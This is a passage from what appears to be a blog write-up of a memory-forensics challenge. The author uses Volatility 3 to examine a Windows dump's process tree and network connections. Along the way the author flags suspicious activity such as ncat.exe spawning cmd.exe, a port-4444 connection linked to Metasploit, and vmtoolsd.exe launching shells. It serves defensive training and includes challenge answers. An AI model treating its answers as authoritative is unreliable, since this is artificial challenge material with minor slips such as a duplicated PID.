white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
</pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">└─$ c</span><span style="color: white;">at pstree.txt | grep --perl-regexp '\s+884\s+' | wc --lines
23</span>
</pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+884\s+'
** 884 696 svchost.exe 0xe78bf2c90080 19 - 0 False 2023-11-16 19:09:13.000000 N/A
*** 9736 884 backgroundTask 0xe78bf61b4080 7 - 1 False 2023-11-16 23:26:04.000000 N/A
*** 2576 884 TextInputHost. 0xe78bf33c1080 21 - 1 False 2023-11-16 19:25:22.000000 N/A
*** 6804 884 RuntimeBroker. 0xe78bf4e2d080 9 - 1 False 2023-11-16 19:25:24.000000 N/A
*** 7956 884 RuntimeBroker. 0xe78bf4e1e080 2 - 1 False 2023-11-16 19:57:25.000000 N/A
*** 3224 884 dllhost.exe 0xe78bf49c2080 7 - 1 False 2023-11-16 19:25:02.000000 N/A
*** 2168 884 WidgetService. 0xe78bf48c50c0 5 - 1 False 2023-11-16 19:30:23.000000 N/A
*** 2592 884 Microsoft.Phot 0xe78bf42bf0c0 15 - 1 False 2023-11-16 19:43:56.000000 N/A
*** 10152 884 smartscreen.ex 0xe78bf707a080 6 - 1 False 2023-11-16 23:56:53.000000 N/A
*** 820 884 ApplicationFra 0xe78bf52680c0 3 - 1 False 2023-11-16 19:30:26.000000 N/A
*** 6204 884 ShellExperienc 0xe78bf33c4080 31 - 1 False 2023-11-16 19:25:21.000000 N/A
*** 2748 884 RuntimeBroker. 0xe78bf4521080 7 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 4944 884 WmiPrvSE.exe 0xe78bf3b95080 9 - 0 False 2023-11-16 19:09:59.000000 N/A
*** 8784 884 RuntimeBroker. 0xe78bf5cc3080 6 - 1 False 2023-11-16 23:56:45.000000 N/A
*** 5080 884 RuntimeBroker. 0xe78bf59c20c0 3 - 1 False 2023-11-16 19:43:59.000000 N/A
*** 3808 884 StartMenuExper 0xe78bf44cf080 16 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 1376 884 RuntimeBroker. 0xe78bf49ac080 5 - 1 False 2023-11-16 19:24:57.000000 N/A
*** 1888 884 UserOOBEBroker 0xe78bf523b080 1 - 1 False 2023-11-16 19:30:30.000000 N/A
*** 1256 884 dllhost.exe 0xe78bf5ef3080 2 - 1 False 2023-11-16 22:50:53.000000 N/A
*** 1260 884 SearchHost.exe 0xe78bf44cc080 76 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 1392 884 Widgets.exe 0xe78bf48e8080 5 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 3448 884 SystemSettings 0xe78bf52350c0 20 - 1 False 2023-11-16 19:30:26.000000 N/A
*** 10108 884 backgroundTask 0xe78bf6ed10c0 8 - 1 False 2023-11-16 23:56:44.000000 N/A</span></pre></div></div><div><br /></div></div><div><div><b>Q:</b> Once again, starting at a count of 2 (**), which process has the largest count of grandchildren?</div><div><b>A:</b> The process with the largest number of grandchildren is cmd.exe with PID 2796 which was spawned by powershell.exe with PID 644.</div></div><div><div>This process has 11 grandchildren.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep --perl-regexp '\s+4668\s+|\s+2796\s+'
***** 2796 644 cmd.exe 0xe78bf68ce0c0 1 - 1 False 2023-11-16 21:29:22.000000 N/A
****** 4668 2796 chrome.exe 0xe78bf69ac0c0 43 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 9152 4668 chrome.exe 0xe78bf65570c0 15 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 6944 4668 chrome.exe 0xe78bf68a8080 15 - 1 False 2023-11-16 21:29:46.000000 N/A
******* 2392 4668 chrome.exe 0xe78bf658a0c0 18 - 1 False 2023-11-16 21:30:06.000000 N/A
******* 5188 4668 chrome.exe 0xe78bf6192080 15 - 1 False 2023-11-16 21:29:27.000000 N/A
******* 7364 4668 chrome.exe 0xe78bf4f60080 9 - 1 False 2023-11-16 21:29:40.000000 N/A
******* 904 4668 chrome.exe 0xe78c05e3d080 15 - 1 False 2023-11-16 21:29:49.000000 N/A
******* 7980 4668 chrome.exe 0xe78bf8e9b0c0 7 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 1356 4668 chrome.exe 0xe78bf69ce0c0 10 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 8628 4668 chrome.exe 0xe78bf69680c0 17 - 1 False 2023-11-16 21:30:11.000000 N/A
******* 8696 4668 chrome.exe 0xe78bf5337080 15 - 1 False 2023-11-16 21:29:31.000000 N/A
******* 9180 4668 chrome.exe 0xe78bf3b440c0 16 - 1 False 2023-11-16 21:29:25.000000 N/A</span>
</pre></div></div><div><br /><div>Looking at another svchost.exe, this time with PID 1652, we see it spawned a child in ncat.exe</div><div><br /></div><div><b>Q:</b> Which process spawned ncat.exe?</div><div><b>A:</b> "<i>svchost.exe</i>" with PID 1652</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep ncat --before-context=2
** 1652 696 svchost.exe 0xe78bf2fb1080 11 - 0 False 2023-11-16 19:09:18.000000 N/A
*** 1432 1652 taskhostw.exe 0xe78bf42a4080 8 - 1 False 2023-11-16 19:24:45.000000 N/A
*** </span><b><span style="color: #fcff01;">896 </span></b><span style="color: white;">1652 </span><b><span style="color: #fcff01;">ncat.exe </span></b><span style="color: white;"> 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A</span>
</pre></div></div><div><br /></div></div><div>One final piece of process information. There are times when there are remnants of processes in memory.</div><div><br /></div><div>First up and as always, I write the information out to a file for easier and quicker processing.<br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.psscan.PsScan > psscan.txt
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div><div>Do we have more processes being reported via PsScan than we saw in PsList?</div><div><br /></div><div><b>Q:</b> How many processes are reported in memory overall?</div><div><b>A:</b> There are 219 processes in memory overall:</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat psscan.txt | sed '1,4d' | wc --lines
219</span>
</pre></div></div><div><br /></div></div><div>I found it strange that this reported 219 when the psList report 220. Maybe I cut out an extra line. Always something that can be revisited.</div><div><br /></div><div>Anyhow, moving on.</div><div><br /></div><div>With this process information gathered, time to look at network information.</div><div><br /></div><div>Write this information to a file:</div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.netstat.NetStat > netstat.txt</b></span><span style="color: white;">
Volatility was unable to read a requested page:nished
Page error 0x1800000028 in layer layer_name (Page Fault at entry 0x0 in table page directory)</span>
</pre></div></div><div><br /></div></div></div></div><div><div><b>Q:</b> How many network connections were either in a LISTENING, ESTABLISHED OR CLOSED state at the time of this capture?</div><div><b>A:</b> 50 connections</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat netstat.txt | sed '1,4d;$d' | wc --lines
50</span>
</pre></div></div><div><br /></div></div><div><div>Q: Of those network connections found, how many were in LISTENING state?</div><div>A: 44<br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat netstat.txt | sed '1,4d;$d' | grep LISTEN | wc --lines
44</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep LISTEN
0xe78bf2daa340 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa340 TCPv6 :: 22 :: 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa4a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf3af4740 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af4740 TCPv6 :: 80 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5920 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf274b4f0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 412 svchost.exe 2023-11-16 19:09:15.000000
0xe78bf274b4f0 TCPv6 :: 135 :: 0 LISTENING 412 svchost.exe 2023-11-16 19:09:15.000000
0xe78bf00fd0d0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 412 svchost.exe 2023-11-16 19:09:15.000000
0xe78bf274a470 TCPv4 10.0.0.108 139 0.0.0.0 0 LISTENING 4 System 2023-11-16 19:09:08.000000
0xe78bf3af5ea0 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv6 :: 443 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5be0 TCPv4 0.0.0.0 3306 0.0.0.0 0 LISTENING 9044 mysqld.exe 2023-11-16 23:26:13.000000
0xe78bf3af5be0 TCPv6 :: 3306 :: 0 LISTENING 9044 mysqld.exe 2023-11-16 23:26:13.000000</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">...</span>
</pre></div></div><div><br /></div><div><b>Q:</b> Of those network connections found, how many were in "<i>ESTABLISHED"</i> state? </div><div>I am disappointed that we do not see the process id and name for these <i>"ESTABLISHED"</i> connections. We can see the PID and name for the "<i>LISTENING</i>" sockets, so ...</div><div>A: 4</div></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat netstat.txt | sed '1,4d;$d' | grep EST | wc --lines
4</span>
</pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep EST
0xe78bf48cd010 TCPv4 10.0.0.108 4444 10.0.0.110 38159 ESTABLISHED - - -
0xe78bf533dac0 TCPv4 10.0.0.108 49957 10.0.0.110 443 ESTABLISHED - - N/A
0xe78bf4f0daa0 TCPv4 10.0.0.108 49685 10.0.0.101 4444 ESTABLISHED - - N/A
0xe78bf3ea6ae0 TCPv4 10.0.0.108 49686 10.0.0.110 22 ESTABLISHED - - N/A</span></pre></div></div><div><br /></div></div><div><div>Q: Of those network connections found, how many were in CLOSED state?</div><div>A: There are 2 sessions in the CLOSED states</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat netstat.txt | sed '1,4d;$d' | grep CLOSED
0xe78bf69bbb00 TCPv4 127.0.0.1 9999 127.0.0.1 50369 CLOSED - - N/A
0xe78bf33adaa0 TCPv4 127.0.0.1 9999 127.0.0.1 50366 CLOSED - - N/A</span>
</pre></div></div><div><br /></div></div><div><div>At this point, we should be able to build our network map of the connections. Let us do that!</div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXQFkFYHRKIogyYGFusYC2FqbM9p_CQJGDhQjGVOq7kJWrX-oVnaSMeI-zJ12lfvoFAbk_E4RVhrIY7ItKjzf4kyLKyD_P_iOmSkPCM_tR5PFETr7Vui2CbA4eV4lZ6nxoedqAqjSvtpCnCIk5jEIi2WhnB62xA5oCmmJg1crim6IxpS8tFSbxMdgJ4lA/s770/snapshot%20map%20of%20network%20activities.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="770" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXQFkFYHRKIogyYGFusYC2FqbM9p_CQJGDhQjGVOq7kJWrX-oVnaSMeI-zJ12lfvoFAbk_E4RVhrIY7ItKjzf4kyLKyD_P_iOmSkPCM_tR5PFETr7Vui2CbA4eV4lZ6nxoedqAqjSvtpCnCIk5jEIi2WhnB62xA5oCmmJg1crim6IxpS8tFSbxMdgJ4lA/w640-h226/snapshot%20map%20of%20network%20activities.PNG" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div><br /></div><div><div>With the insights from network statistics, let's look to see if there are any remnants of connections in memory.</div><div><br /></div><div>As always, writing the information to a file for further analysis.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.netscan.NetScan > netscan.txt
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div></div><div><div>Looking into memory we see additional connection.</div><div>Comparing the ESTABLISHED sessions ports with outputs from <i>netscan</i>.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat netstat.txt | grep EST
0xe78bf48cd010 TCPv4 10.0.0.108 4444 10.0.0.110 38159 ESTABLISHED - - -
0xe78bf533dac0 TCPv4 10.0.0.108 49957 10.0.0.110 443 ESTABLISHED - - N/A
0xe78bf4f0daa0 TCPv4 10.0.0.108 49685 10.0.0.101 4444 ESTABLISHED - - N/A
0xe78bf3ea6ae0 TCPv4 10.0.0.108 49686 10.0.0.110 22 ESTABLISHED - - N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netscan.txt | grep --perl-regexp '\s+4444\s+|\s+443\s+|\s+22\s+'
0xe78bf2daa340 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa340 TCPv6 :: 22 :: 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa4a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa600 TCPv6 ::1 9999 :: 0 LISTENING 4444 ssh.exe 2023-11-16 21:15:54.000000
0xe78bf2daa760 TCPv4 127.0.0.1 9999 0.0.0.0 0 LISTENING 4444 ssh.exe 2023-11-16 21:15:54.000000
0xe78bf3af4060 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv6 :: 443 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000</span>
</pre></div></div><div><br /></div></div><div><div>At first glance, <i>4444 </i>above in the <i>netscan</i> ouput had me thinking this was a port. However, from the memory dump, it seems this is the PID associated with <i>ssh.exe</i>. Why did I mention that point?! It is important that we do not introduce our biases to our analysis/investigation. It is even more important that we recognize those biases early. At the same time, if we look at the <i>netstat</i> output focusing on the <i>ESTABLISHED</i> sessions, we see there is a port <i>4444</i>. This is typically associated with Metasploit. Hence this may be a real problem for us.</div><div><br /></div><div>Moving on.</div><div><br /></div><div>Actually, I am very disappointed, that I did not have the PIDs, Owner, etc., for the processes that were in <i>ESTABLISHED</i> state via netstat. This just made this self-paced learning a bit more interesting for me.</div><div><br /></div><div>Going back to the process tree</div><div><br /></div><div><b>Q: </b>From the process information previously reviewed, how many "suspicious" processes do you see? Why do you consider these processes as suspicious?</div><div><br /></div><div><b>A:</b> There is <i>ncat.exe</i> with PID 896 which spawned <i>connhost.exe</i> with PID <i>6148 </i>and <i>cmd.exe </i>with PID <i>8724</i>. </div><div>Ncat is known as the <i>Swiss Army Knife </i>and can be used for many things. It does not come installed by default on Windows.</div><div>This means, so far we have 3 suspicious processes (at least for me).</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep --perl-regexp '\s+896\s+'
*** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A
**** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A
**** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A</span>
</pre></div></div><div><br /></div></div><div><div><b>Q: </b>What are the name(s) and Process ID(s) of these processes?</div><div><b>A:</b> I am also concerned about process vmtoolsd.exe with PID 7164, spawning the following processes:</div><div> ** cmd.exe > PID:5176</div><div> ** cmd.exe > PID:5176</div><div> ** cmd.exe > PID: 7072</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep --perl-regexp '\s+7164\s+|\s+7072\s+'
*** 7164 1100 vmtoolsd.exe 0xe78bf431e080 12 - 1 False 2023-11-16 19:25:21.000000 N/A
**** 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000
**** 4940 7164 cmd.exe 0xe78bf05391c0 1 - 1 False 2023-11-16 22:12:51.000000 N/A
**** 7072 7164 cmd.exe 0xe78bf59e01c0 1 - 1 False 2023-11-16 23:01:17.000000 N/A
***** 1364 7072 conhost.exe 0xe78c05e54080 3 - 1 False 2023-11-16 23:01:17.000000 N/A</span>
</pre></div></div><div><br /></div></div><div><div>We now have another 5 processes for a total of 8 that seems to be of immediate concern to me (your perspective my differ).</div><div><br /></div><div>I am going to close off with this final group. I see Windows Terminal is the parent or grandparent of these processes. So at first glance, while I would not consider them suspicious, I still consider them as items to be reviewed. Trust but verify!<br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+2460\s+|\s+4728\s+'
*** 2460 1100 WindowsTermina 0xe78bf4f240c0 16 - 1 False 2023-11-16 20:04:59.000000 N/A
**** 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 2692 2460 OpenConsole.ex 0xe78bf65680c0 5 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 5736 2460 OpenConsole.ex 0xe78bf3b880c0 5 - 1 False 2023-11-16 20:05:01.000000 N/A
**** 2352 2460 OpenConsole.ex 0xe78bf46eb0c0 5 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 1684 2460 OpenConsole.ex 0xe78bf63380c0 5 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 3032 2460 cmd.exe 0xe78bf4e2a080 1 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A
***** 6152 4728 cmd.exe 0xe78bf5caf0c0 1 - 1 False 2023-11-16 20:16:37.000000 N/A</span>
</pre></div></div><div><br /></div><div>We now have a total of 18 process that I will consider as suspicious.</div></div><div><br /></div><div><div><b>Q:</b> Why do you think these processes are suspicious?</div><div><b>A:</b> Now for everyone suspicion may vary. However, for this scenario these represent my starting point. I choose these primarily because of the fact that I see <i>powershell.exe</i> and <i>cmd.exe </i>along with in some cases, I'm concerned about the parent spawning these shells. For example, why is vmtoolsd.exe spawning <i>cmd.exe</i>. That is s a big concern. Maybe it is normal, maybe it is not. However, our job is to find out.</div><div><br /></div><div>With the suspicious processes Identified, Let's write all those to a file so we can keep them separated from everything else and make our analysis easier and somewhat cleaner.</div></div><br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep --perl-regexp '896'
*** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A
**** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A
**** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A
** 5896 696 SgrmBroker.exe 0xe78bf3c9a080 7 - 0 False 2023-11-16 19:11:51.000000 N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '896' >> suspicious_processes.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+7164\s+|\s+7072\s+' >> suspicious_processes.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+2460\s+|\s+4728\s+' >> suspicious_processes.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ls suspicious_processes.txt
suspicious_processes.txt</span>
</pre><div><br /></div></div></div><div><br /></div><div>With a list of suspicious processes, now we can look forward;</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat suspicious_processes.txt
*** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A
**** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A
**** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A
** 5896 696 SgrmBroker.exe 0xe78bf3c9a080 7 - 0 False 2023-11-16 19:11:51.000000 N/A
*** 7164 1100 vmtoolsd.exe 0xe78bf431e080 12 - 1 False 2023-11-16 19:25:21.000000 N/A
**** 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000
**** 4940 7164 cmd.exe 0xe78bf05391c0 1 - 1 False 2023-11-16 22:12:51.000000 N/A
**** 7072 7164 cmd.exe 0xe78bf59e01c0 1 - 1 False 2023-11-16 23:01:17.000000 N/A
***** 1364 7072 conhost.exe 0xe78c05e54080 3 - 1 False 2023-11-16 23:01:17.000000 N/A
*** 2460 1100 WindowsTermina 0xe78bf4f240c0 16 - 1 False 2023-11-16 20:04:59.000000 N/A
**** 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 2692 2460 OpenConsole.ex 0xe78bf65680c0 5 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 5736 2460 OpenConsole.ex 0xe78bf3b880c0 5 - 1 False 2023-11-16 20:05:01.000000 N/A
**** 2352 2460 OpenConsole.ex 0xe78bf46eb0c0 5 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 1684 2460 OpenConsole.ex 0xe78bf63380c0 5 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 3032 2460 cmd.exe 0xe78bf4e2a080 1 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A
***** 6152 4728 cmd.exe 0xe78bf5caf0c0 1 - 1 False 2023-11-16 20:16:37.000000 N/A</span>
